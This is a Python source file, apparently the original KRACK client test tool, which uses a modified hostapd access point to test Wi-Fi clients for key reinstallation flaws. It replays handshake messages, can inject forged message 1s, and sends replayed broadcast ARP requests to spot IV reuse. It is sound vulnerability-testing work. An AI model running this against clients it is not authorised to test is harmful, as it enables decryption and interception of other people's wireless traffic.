krack-test-client.py 25 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617
  1. #!/usr/bin/env python2
  2. # Tests for key reinstallation vulnerabilities in Wi-Fi clients
  3. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  4. #
  5. # This code may be distributed under the terms of the BSD license.
  6. # See README for more details.
  7. import logging
  8. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  9. from scapy.all import *
  10. from libwifi import *
  11. import sys, socket, struct, time, subprocess, atexit, select, os.path
  12. from wpaspy import Ctrl
  13. # FIXME:
  14. # - If the client installs an all-zero key, we cannot reliably test the group key handshake
  15. # - We should test decryption using an all-zero key, and warn if this seems to succeed
  16. # Future work:
  17. # - Detect if the client reinstalls an all-zero encryption key (wpa_supplicant v2.4 and 2.5)
  18. # - Ability to test the group key handshake against specific clients only
  19. # - Individual test to see if the client accepts replayed broadcast traffic (without performing key reinstallation)
  20. # FIXME: We are repeating the "disable hw encryption" of FT tests
  21. USAGE = """{name} - Tool to test Key Reinstallation Attacks against clients
  22. To test wheter a client is vulnerable to Key Reinstallation Attack against
  23. the 4-way handshake or group key handshake, take the following steps:
  24. 1. Compile our modified hostapd instance. This only needs to be done once.
  25. cd ../hostapd
  26. cp defconfig .config
  27. make -j 2
  28. 2. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  29. with our script. So disable hardware encryption by executing:
  30. cd ../krackattack/
  31. ./disable-hwcrypto.sh
  32. This only needs to be done once. It's recommended to reboot after executing
  33. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  34. or similar to confirm the nohwcript/.. param has been set. We tested this
  35. script with an Intel Dual Band Wireless-AC 7260 and a TP-Link TL-WN722N.
  36. 3. Execute this script. Accepted parameters are:
  37. --group Test the group key handshake instead of the 4-way handshake
  38. --debug Show more debug messages
  39. --tptk See step 5 (forge Msg1/4 with replayed ANonce before Msg3/4)
  40. --tptk-rand See step 5 (forge Msg1/4 with random ANonce before Msg3/4)
  41. All other supplied arguments are passed on to hostapd.
  42. The only two commands you will normally have to execute are:
  43. {name}
  44. {name} --group
  45. The first one tests for key reinstallations in the 4-way handshake (see
  46. step 4), and the second tests one for key reinstallations in the group key
  47. handshake (see step 5).
  48. !! The default network name is testnetwork with password abcdefgh !!
  49. Note that you can change settings of the AP by modifying hostapd.conf.
  50. You will probably have to edit the line `interface=` to specify the
  51. correct Wi-Fi interface to use for the AP.
  52. 4. To test key reinstallations in the 4-way handshake, the script will keep
  53. sending encrypted message 3's to the client. To start the script execute:
  54. {name}
  55. Connect the the AP and the following tests will be performed automatically:
  56. 4a. The script monitors traffic sent by the client to see if the pairwise
  57. key is being reinstalled. To assure the client is sending enough frames,
  58. you can optionally ping the AP: ping 192.168.100.254 .
  59. If the client is vulnerable, the script will show something like:
  60. [19:02:37] 78:31:c1:c4:88:92: IV reuse detected (IV=1, seq=10). Client is vulnerable to pairwise key reinstallations in the 4-way handshake!
  61. If the client is patched, the script will show (this can take a minute):
  62. [18:58:11] 90:18:7c:6e:6b:20: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake.
  63. 4b. Once the client has requested an IP using DHCP, the script tests for
  64. reinstallations of the group key by sending broadcast ARP requests to the
  65. client using an already used (replayed) packet number (= IV). The client
  66. *must* request an IP using DHCP for this test to start.
  67. If the client is vulnerable, the script will show something like:
  68. [19:03:08] 78:31:c1:c4:88:92: Received 5 unique replies to replayed broadcast ARP requests. Client is vulnerable to group
  69. [19:03:08] key reinstallations in the 4-way handshake (or client accepts replayed broadcast frames)!
  70. If the client is patched, the script will show (this can take a minute):
  71. [19:03:08] 78:31:c1:c4:88:92: client DOESN'T seem vulnerable to group key reinstallation in the 4-way handshake handshake.
  72. Note that this scripts *indirectly* tests for reinstallations of the group
  73. key, by testing if replayed broadcast frames are accepted by the client.
  74. 5. Some supplicants (e.g. wpa_supplicant v2.6) are only vulnerable to pairwise
  75. key reinstallations in the 4-way handshake when a forged message 1 is
  76. injected before sending a retransmitted message 3. To test for this variant
  77. of the attack, you can execute:
  78. {name} --tptk # Inject message 1 with a replayed ANonce
  79. {name} --tptk-rand # Inject message 1 with a random ANonce
  80. Now follow the same steps as in step 4 to see if a supplicant is vulnerable.
  81. Try both these attack variants after running the normal tests of step 4.
  82. 6. To test key reinstallations in the group key handshake, the script will keep
  83. performing new group key handshakes using an identical (static) group key.
  84. The client *must* request an IP using DHCP for this test to start. To start
  85. the script execute:
  86. {name} --group
  87. Connect the the AP and all tests will be performed automatically. The
  88. working and output of the script is now similar as in step 4b.
  89. 7. Some final recommendations:
  90. 6a. Perform these tests in a room with little interference. A high amount
  91. of packet loss will make this script unreliable!
  92. 6b. Manually inspect network traffic to confirm the output of the script:
  93. - Use an extra Wi-Fi NIC in monitor mode to check pairwise key reinstalls
  94. by monitoring the IVs of frames sent by the client.
  95. - Capture traffic on the client to see if the replayed broadcast ARP
  96. requests are accepted or not.
  97. 6c. If the client being tested can use multiple Wi-Fi radios/NICs, test
  98. using a few different ones.
  99. """
  100. # After how many seconds a new message 3, or new group key message 1, is sent.
  101. # This value must match the one in `../src/ap/wpa_auth.c` (same variable name).
  102. HANDSHAKE_TRANSMIT_INTERVAL = 2
  103. #### Utility Commands ####
  104. def hostapd_command(hostapd_ctrl, cmd):
  105. rval = hostapd_ctrl.request(cmd)
  106. if "UNKNOWN COMMAND" in rval:
  107. log(ERROR, "Hostapd did not recognize the command %s. Did you (re)compile hostapd?" % cmd.split()[0])
  108. quit(1)
  109. return rval
  110. #### Main Testing Code ####
  111. class ClientState():
  112. UNKNOWN, VULNERABLE, PATCHED = range(3)
  113. IDLE, STARTED, GOT_CANARY, FINISHED = range(4)
  114. def __init__(self, clientmac, test_group_hs=False, test_tptk=False):
  115. self.mac = clientmac
  116. self.TK = None
  117. self.vuln_4way = ClientState.UNKNOWN
  118. self.vuln_group = ClientState.UNKNOWN
  119. # FIXME: Separate variable for group handshake result?
  120. self.ivs = IvCollection()
  121. self.pairkey_sent_time_prev_iv = None
  122. self.pairkey_intervals_no_iv_reuse = 0
  123. self.pairkey_tptk = test_tptk
  124. self.groupkey_reset()
  125. self.groupkey_grouphs = test_group_hs
  126. def groupkey_reset(self):
  127. self.groupkey_state = ClientState.IDLE
  128. self.groupkey_prev_canary_time = 0
  129. self.groupkey_num_canaries = 0
  130. self.groupkey_requests_sent = 0
  131. self.groupkey_patched_intervals = -1 # -1 because the first broadcast ARP requests are still valid
  132. def start_grouphs_test():
  133. self.groupkey_reset()
  134. self.groupkey_grouphs = True
  135. # TODO: Put in libwifi?
  136. def get_encryption_key(self, hostapd_ctrl):
  137. if self.TK is None:
  138. # Clear old replies and messages from the hostapd control interface
  139. while hostapd_ctrl.pending():
  140. hostapd_ctrl.recv()
  141. # Contact our modified Hostapd instance to request the pairwise key
  142. response = hostapd_command(hostapd_ctrl, "GET_TK " + self.mac)
  143. if not "FAIL" in response:
  144. self.TK = response.strip().decode("hex")
  145. return self.TK
  146. # TODO: Put in libwifi?
  147. def decrypt(self, p, hostapd_ctrl):
  148. payload = get_ccmp_payload(p)
  149. llcsnap, packet = payload[:8], payload[8:]
  150. if payload.startswith("\xAA\xAA\x03\x00\x00\x00"):
  151. # On some kernels, the virtual interface associated to the real AP interface will return
  152. # frames where the payload is already decrypted (this happens when hardware decryption is
  153. # used). So if the payload seems decrypted, just extract the full plaintext from the frame.
  154. plaintext = payload
  155. else:
  156. key = self.get_encryption_key(hostapd_ctrl)
  157. plaintext = decrypt_ccmp(p, key)
  158. # If it still fails, try an all-zero key
  159. if not plaintext.startswith("\xAA\xAA\x03\x00\x00\x00"):
  160. plaintext = decrypt_ccmp(p, "\x00" * 16)
  161. return plaintext
  162. def track_used_iv(self, p):
  163. return self.ivs.track_used_iv(p)
  164. def is_iv_reused(self, p):
  165. return self.ivs.is_iv_reused(p)
  166. def check_pairwise_reinstall(self, p):
  167. """Inspect whether the IV is reused, or whether the client seem to be patched"""
  168. # If this is gaurenteed IV reuse (and not just a benign retransmission), mark the client as vulnerable
  169. if self.ivs.is_iv_reused(p):
  170. if self.vuln_4way != ClientState.VULNERABLE:
  171. iv = dot11_get_iv(p)
  172. seq = dot11_get_seqnum(p)
  173. log(INFO, ("%s: IV reuse detected (IV=%d, seq=%d). " +
  174. "Client is vulnerable to pairwise key reinstallations in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  175. self.vuln_4way = ClientState.VULNERABLE
  176. # If it's a higher IV than all previous ones, try to check if the client seems patched
  177. elif self.vuln_4way == ClientState.UNKNOWN and self.ivs.is_new_iv(p):
  178. # Save how many intervals we received a data packet without IV reset. Use twice the
  179. # transmission interval of message 3, in case one message 3 is lost due to noise.
  180. if self.pairkey_sent_time_prev_iv is None:
  181. self.pairkey_sent_time_prev_iv = p.time
  182. elif self.pairkey_sent_time_prev_iv + 2 * HANDSHAKE_TRANSMIT_INTERVAL + 1 <= p.time:
  183. self.pairkey_intervals_no_iv_reuse += 1
  184. self.pairkey_sent_time_prev_iv = p.time
  185. log(DEBUG, "%s: no pairwise IV resets seem to have occured for one interval" % self.mac)
  186. # If during several intervals all IV reset attempts failed, the client is likely patched.
  187. # We wait for enough such intervals to occur, to avoid getting a wrong result.
  188. if self.pairkey_intervals_no_iv_reuse >= 5 and self.vuln_4way == ClientState.UNKNOWN:
  189. self.vuln_4way = ClientState.PATCHED
  190. # Be sure to clarify *which* type of attack failed (to remind user to test others attacks as well)
  191. msg = "%s: client DOESN'T seem vulnerable to pairwise key reinstallation in the 4-way handshake"
  192. if self.pairkey_tptk == KRAckAttackClient.TPTK_NONE:
  193. msg += " (using standard attack)"
  194. elif self.pairkey_tptk == KRAckAttackClient.TPTK_REPLAY:
  195. msg += " (using TPTK attack)"
  196. elif self.pairkey_tptk == KRAckAttackClient.TPTK_RAND:
  197. msg += " (using TPTK-RAND attack)"
  198. log(INFO, (msg + ".") % self.mac, color="green")
  199. def mark_allzero_key(self, p):
  200. if self.vuln_4way != ClientState.VULNERABLE:
  201. iv = dot11_get_iv(p)
  202. seq = dot11_get_seqnum(p)
  203. log(INFO, ("%s: usage of all-zero key detected (IV=%d, seq=%d). " +
  204. "Client is vulnerable to (re)installation of an all-zero key in the 4-way handshake!") % (self.mac, iv, seq), color="green")
  205. log(WARNING, "%s: !!! Other tests are unreliable due to all-zero key usage, please fix this first !!!" % self.mac)
  206. self.vuln_4way = ClientState.VULNERABLE
  207. def groupkey_handle_canary(self, p):
  208. """Handle replies to the replayed ARP broadcast request (which reuses an IV)"""
  209. # Must be testing this client, and must not be a benign retransmission
  210. if not self.groupkey_state in [ClientState.STARTED, ClientState.GOT_CANARY]: return
  211. if self.groupkey_prev_canary_time + 1 > p.time: return
  212. self.groupkey_num_canaries += 1
  213. log(DEBUG, "%s: received %d replies to the replayed broadcast ARP requests" % (self.mac, self.groupkey_num_canaries))
  214. # We wait for several replies before marking the client as vulnerable, because
  215. # the first few broadcast ARP requests still use a valid (not yet used) IV.
  216. if self.groupkey_num_canaries >= 5:
  217. assert self.vuln_group != ClientState.VULNERABLE
  218. log(INFO, "%s: Received %d unique replies to replayed broadcast ARP requests. Client is vulnerable to group" \
  219. % (self.mac, self.groupkey_num_canaries), color="green")
  220. log(INFO, " key reinstallations in the %s handshake (or client accepts replayed broadcast frames)!" \
  221. % ("group key" if self.groupkey_grouphs else "4-way"), color="green")
  222. self.vuln_group = ClientState.VULNERABLE
  223. self.groupkey_state = ClientState.FINISHED
  224. # Remember that we got a reply this interval (see groupkey_track_request to detect patched clients)
  225. else:
  226. self.groupkey_state = ClientState.GOT_CANARY
  227. self.groupkey_prev_canary_time = p.time
  228. def groupkey_track_request(self):
  229. """Track when we went broadcast ARP requests, and determine if a client seems patched"""
  230. if self.vuln_group != ClientState.UNKNOWN: return
  231. hstype = "group key" if self.groupkey_grouphs else "4-way"
  232. # Show a message when we started with testing the client
  233. if self.groupkey_state == ClientState.IDLE:
  234. log(STATUS, "%s: client has IP address -> testing for group key reinstallation in the %s handshake" % (self.mac, hstype))
  235. self.groupkey_state = ClientState.STARTED
  236. if self.groupkey_requests_sent == 4:
  237. # We sent four broadcast ARP requests, and got at least one got a reply. This indicates the client is vulnerable.
  238. if self.groupkey_state == ClientState.GOT_CANARY:
  239. log(DEBUG, "%s: got a reply to broadcast ARP during this interval" % self.mac)
  240. self.groupkey_state = ClientState.STARTED
  241. # We sent four broadcast ARP requests, and didn't get a reply to any. This indicates the client is patched.
  242. elif self.groupkey_state == ClientState.STARTED:
  243. self.groupkey_patched_intervals += 1
  244. log(DEBUG, "%s: no group IV resets seem to have occured for %d interval(s)" % (self.mac, self.groupkey_patched_intervals))
  245. self.groupkey_state = ClientState.STARTED
  246. self.groupkey_requests_sent = 0
  247. # If the client appears secure for several intervals (see above), it's likely patched
  248. if self.groupkey_patched_intervals >= 5 and self.vuln_group == ClientState.UNKNOWN:
  249. log(INFO, "%s: client DOESN'T seem vulnerable to group key reinstallation in the %s handshake." % (self.mac, hstype), color="green")
  250. self.vuln_group = ClientState.PATCHED
  251. self.groupkey_state = ClientState.FINISHED
  252. self.groupkey_requests_sent += 1
  253. log(DEBUG, "%s: sent %d broadcasts ARPs this interval" % (self.mac, self.groupkey_requests_sent))
  254. class KRAckAttackClient():
  255. TPTK_NONE, TPTK_REPLAY, TPTK_RAND = range(3)
  256. def __init__(self):
  257. # Parse hostapd.conf
  258. self.script_path = os.path.dirname(os.path.realpath(__file__))
  259. try:
  260. interface = hostapd_read_config(os.path.join(self.script_path, "hostapd.conf"))
  261. except Exception as ex:
  262. log(ERROR, "Failed to parse the hostapd.conf config file")
  263. raise
  264. if not interface:
  265. log(ERROR, 'Failed to determine wireless interface. Specify one in hostapd.conf at the line "interface=NAME".')
  266. quit(1)
  267. # Set other variables
  268. self.nic_iface = interface
  269. self.nic_mon = interface + "mon"
  270. self.test_grouphs = False
  271. self.test_tptk = KRAckAttackClient.TPTK_NONE
  272. try:
  273. self.apmac = scapy.arch.get_if_hwaddr(interface)
  274. except:
  275. log(ERROR, 'Failed to get MAC address of %s. Specify an existing interface in hostapd.conf at the line "interface=NAME".' % interface)
  276. raise
  277. self.sock_mon = None
  278. self.sock_eth = None
  279. self.hostapd = None
  280. self.hostapd_ctrl = None
  281. self.dhcp = None
  282. self.group_ip = None
  283. self.group_arp = None
  284. self.clients = dict()
  285. def reset_client_info(self, clientmac):
  286. if clientmac in self.dhcp.leases:
  287. self.dhcp.remove_client(clientmac)
  288. log(DEBUG, "%s: Removing client from DHCP leases" % clientmac)
  289. if clientmac in self.clients:
  290. del self.clients[clientmac]
  291. log(DEBUG, "%s: Removing ClientState object" % clientmac)
  292. def handle_replay(self, p):
  293. """Replayed frames (caused by a pairwise key reinstallation) are rejected by the kernel. This
  294. function processes these frames manually so we can still test reinstallations of the group key."""
  295. if not Dot11WEP in p: return
  296. # Reconstruct Ethernet header
  297. clientmac = p.addr2
  298. header = Ether(dst=self.apmac, src=clientmac)
  299. header.time = p.time
  300. # Decrypt the payload and obtain LLC/SNAP header and packet content
  301. client = self.clients[clientmac]
  302. plaintext = client.decrypt(p, self.hostapd_ctrl)
  303. llcsnap, packet = plaintext[:8], plaintext[8:]
  304. # Rebuild the full Ethernet packet
  305. if llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x06":
  306. decap = header/ARP(packet)
  307. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x08\x00":
  308. decap = header/IP(packet)
  309. elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x86\xdd":
  310. decap = header/IPv6(packet)
  311. #elif llcsnap == "\xAA\xAA\x03\x00\x00\x00\x88\x8e":
  312. # # EAPOL
  313. else:
  314. return
  315. # Now process the packet as if it were a valid (non-replayed) one
  316. self.process_eth_rx(decap)
  317. def handle_mon_rx(self):
  318. p = self.sock_mon.recv()
  319. if p == None: return
  320. if p.type == 1: return
  321. # Note: we cannot verify that the NIC is indeed reusing IVs when sending the broadcast
  322. # ARP requests, because it may override them in the firmware/hardware (some Atheros
  323. # Wi-Fi NICs do no properly reset the Tx group key IV when using hardware encryption).
  324. # The first bit in FCfield is set if the frames is "to-DS"
  325. clientmac, apmac = (p.addr1, p.addr2) if (p.FCfield & 2) != 0 else (p.addr2, p.addr1)
  326. if apmac != self.apmac: return None
  327. # Reset info about disconnected clients
  328. if Dot11Deauth in p or Dot11Disas in p:
  329. self.reset_client_info(clientmac)
  330. # Inspect encrypt frames for IV reuse & handle replayed frames rejected by the kernel
  331. elif p.addr1 == self.apmac and Dot11WEP in p:
  332. if not clientmac in self.clients:
  333. self.clients[clientmac] = ClientState(clientmac, test_group_hs=self.test_grouphs, test_tptk=self.test_tptk)
  334. client = self.clients[clientmac]
  335. iv = dot11_get_iv(p)
  336. log(DEBUG, "%s: transmitted data using IV=%d (seq=%d)" % (clientmac, iv, dot11_get_seqnum(p)))
  337. if decrypt_ccmp(p, "\x00" * 16).startswith("\xAA\xAA\x03\x00\x00\x00"):
  338. client.mark_allzero_key(p)
  339. if not self.test_grouphs:
  340. client.check_pairwise_reinstall(p)
  341. if client.is_iv_reused(p):
  342. self.handle_replay(p)
  343. client.track_used_iv(p)
  344. def process_eth_rx(self, p):
  345. self.dhcp.reply(p)
  346. self.group_arp.reply(p)
  347. clientmac = p[Ether].src
  348. if not clientmac in self.clients: return
  349. client = self.clients[clientmac]
  350. if ARP in p and p[ARP].pdst == self.group_ip:
  351. client.groupkey_handle_canary(p)
  352. def handle_eth_rx(self):
  353. p = self.sock_eth.recv()
  354. if p == None or not Ether in p: return
  355. self.process_eth_rx(p)
  356. def configure_interfaces(self):
  357. log(STATUS, "Note: disable Wi-Fi in network manager & disable hardware encryption. Both may interfere with this script.")
  358. # 0. Some users may forget this otherwise
  359. subprocess.check_output(["rfkill", "unblock", "wifi"])
  360. # 1. Remove unused virtual interfaces to start from a clean state
  361. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  362. # 2. Configure monitor mode on interfaces
  363. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  364. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  365. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  366. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  367. time.sleep(0.5)
  368. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  369. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  370. def run(self, test_grouphs=False, test_tptk=False):
  371. self.configure_interfaces()
  372. # Open the patched hostapd instance that carries out tests and let it start
  373. log(STATUS, "Starting hostapd ...")
  374. try:
  375. self.hostapd = subprocess.Popen([
  376. os.path.join(self.script_path, "../hostapd/hostapd"),
  377. os.path.join(self.script_path, "hostapd.conf")]
  378. + sys.argv[1:])
  379. except:
  380. if not os.path.exists("../hostapd/hostapd"):
  381. log(ERROR, "hostapd executable not found. Did you compile hostapd? Use --help param for more info.")
  382. raise
  383. time.sleep(1)
  384. try:
  385. self.hostapd_ctrl = Ctrl("hostapd_ctrl/" + self.nic_iface)
  386. self.hostapd_ctrl.attach()
  387. except:
  388. log(ERROR, "It seems hostapd did not start properly, please inspect its output.")
  389. log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise hostapd won't work.")
  390. raise
  391. self.sock_mon = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  392. self.sock_eth = L2Socket(type=ETH_P_ALL, iface=self.nic_iface)
  393. # Let scapy handle DHCP requests
  394. self.dhcp = DHCP_sock(sock=self.sock_eth,
  395. domain='krackattack.com',
  396. pool=Net('192.168.100.0/24'),
  397. network='192.168.100.0/24',
  398. gw='192.168.100.254',
  399. renewal_time=600, lease_time=3600)
  400. # Configure gateway IP: reply to ARP and ping requests
  401. subprocess.check_output(["ifconfig", self.nic_iface, "192.168.100.254"])
  402. # Use a dedicated IP address for our broadcast ARP requests and replies
  403. self.group_ip = self.dhcp.pool.pop()
  404. self.group_arp = ARP_sock(sock=self.sock_eth, IP_addr=self.group_ip, ARP_addr=self.apmac)
  405. # If applicable, inform hostapd that we are testing the group key handshake
  406. if test_grouphs:
  407. hostapd_command(self.hostapd_ctrl, "START_GROUP_TESTS")
  408. self.test_grouphs = True
  409. # If applicable, inform hostapd that we are testing for Temporal PTK (TPTK) construction behaviour
  410. self.test_tptk = test_tptk
  411. if self.test_tptk == KRAckAttackClient.TPTK_REPLAY:
  412. hostapd_command(self.hostapd_ctrl, "TEST_TPTK")
  413. elif self.test_tptk == KRAckAttackClient.TPTK_RAND:
  414. hostapd_command(self.hostapd_ctrl, "TEST_TPTK_RAND")
  415. log(STATUS, "Ready. Connect to this Access Point to start the tests. Make sure the client requests an IP using DHCP!", color="green")
  416. # Monitor both the normal interface and virtual monitor interface of the AP
  417. self.next_arp = time.time() + 1
  418. while True:
  419. sel = select.select([self.sock_mon, self.sock_eth], [], [], 1)
  420. if self.sock_mon in sel[0]: self.handle_mon_rx()
  421. if self.sock_eth in sel[0]: self.handle_eth_rx()
  422. # Periodically send the replayed broadcast ARP requests to test for group key reinstallations
  423. if time.time() > self.next_arp:
  424. self.next_arp = time.time() + HANDSHAKE_TRANSMIT_INTERVAL
  425. for client in self.clients.values():
  426. # Also keep injecting to PATCHED clients (just to be sure they keep rejecting replayed frames)
  427. if client.vuln_group != ClientState.VULNERABLE and client.mac in self.dhcp.leases:
  428. clientip = self.dhcp.leases[client.mac]
  429. client.groupkey_track_request()
  430. log(INFO, "%s: sending broadcast ARP to %s from %s" % (client.mac, clientip, self.group_ip))
  431. request = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, hwsrc=self.apmac, psrc=self.group_ip, pdst=clientip)
  432. self.sock_eth.send(request)
  433. def stop(self):
  434. log(STATUS, "Closing hostapd and cleaning up ...")
  435. if self.hostapd:
  436. self.hostapd.terminate()
  437. self.hostapd.wait()
  438. if self.sock_mon: self.sock_mon.close()
  439. if self.sock_eth: self.sock_eth.close()
  440. def cleanup():
  441. attack.stop()
  442. def argv_get_interface():
  443. for i in range(len(sys.argv)):
  444. if not sys.argv[i].startswith("-i"):
  445. continue
  446. if len(sys.argv[i]) > 2:
  447. return sys.argv[i][2:]
  448. else:
  449. return sys.argv[i + 1]
  450. return None
  451. def argv_pop_argument(argument):
  452. if not argument in sys.argv: return False
  453. idx = sys.argv.index(argument)
  454. del sys.argv[idx]
  455. return True
  456. def hostapd_read_config(config):
  457. # Read the config, get the interface name, and verify some settings.
  458. interface = None
  459. with open(config) as fp:
  460. for line in fp.readlines():
  461. line = line.strip()
  462. if line.startswith("interface="):
  463. interface = line.split('=')[1]
  464. elif line.startswith("wpa_pairwise=") or line.startswith("rsn_pairwise"):
  465. if "TKIP" in line:
  466. log(ERROR, "ERROR: We only support tests using CCMP. Only include CCMP in %s config at the following line:" % config)
  467. log(ERROR, " >%s<" % line, showtime=False)
  468. quit(1)
  469. # Parameter -i overrides interface in config.
  470. # FIXME: Display warning when multiple interfaces are used.
  471. if argv_get_interface() is not None:
  472. interface = argv_get_interface()
  473. return interface
  474. if __name__ == "__main__":
  475. if "--help" in sys.argv or "-h" in sys.argv:
  476. print USAGE.format(name=sys.argv[0])
  477. quit(1)
  478. test_grouphs = argv_pop_argument("--group")
  479. test_tptk_replay = argv_pop_argument("--tptk")
  480. test_tptk_rand = argv_pop_argument("--tptk-rand")
  481. while argv_pop_argument("--debug"):
  482. global_log_level -= 1
  483. test_tptk = KRAckAttackClient.TPTK_NONE
  484. if test_tptk_replay and test_tptk_rand:
  485. log(ERROR, "Please only specify --tptk or --tptk-rand")
  486. elif test_tptk_replay:
  487. test_tptk = KRAckAttackClient.TPTK_REPLAY
  488. elif test_tptk_rand:
  489. test_tptk = KRAckAttackClient.TPTK_RAND
  490. attack = KRAckAttackClient()
  491. atexit.register(cleanup)
  492. attack.run(test_grouphs=test_grouphs, test_tptk=test_tptk)